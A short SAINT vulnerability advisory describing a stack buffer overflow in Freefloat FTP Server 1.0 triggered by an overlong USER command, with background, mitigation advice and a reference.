Freefloat FTP Server USER Command Buffer Overflow

2011-01-26T00:00:00
ID SAINT:CDD8B48E1A4694EBE002F37D3D232CDF
Type saint
Reporter SAINT Corporation
Modified 2011-01-26T00:00:00

Description

Added: 01/26/2011
BID: 45181
OSVDB: 69621

Background

Freefloat is a software series developed directly for handheld terminals. Freefloat FTP Server is a free FTP server for various versions of Windows including Windows CE/Pocket PC.

Problem

Freefloat FTP Server is vulnerable to a stack overflow as a result of sending overly long replies. The vulnerability can be triggered by the attacker by sending the FTP server a **USER** command with an overly long username parameter.

Resolution

Use a firewall to restrict access to trusted computers, install an update from the vendor when one becomes available, or choose another FTP server.

References

<http://secunia.com/advisories/42465/>

Limitations

Exploit works on Freefloat FTP Server 1.0 on Microsoft Windows Server 2003 SP2 with KB956802 and KB956572.

Platforms

Windows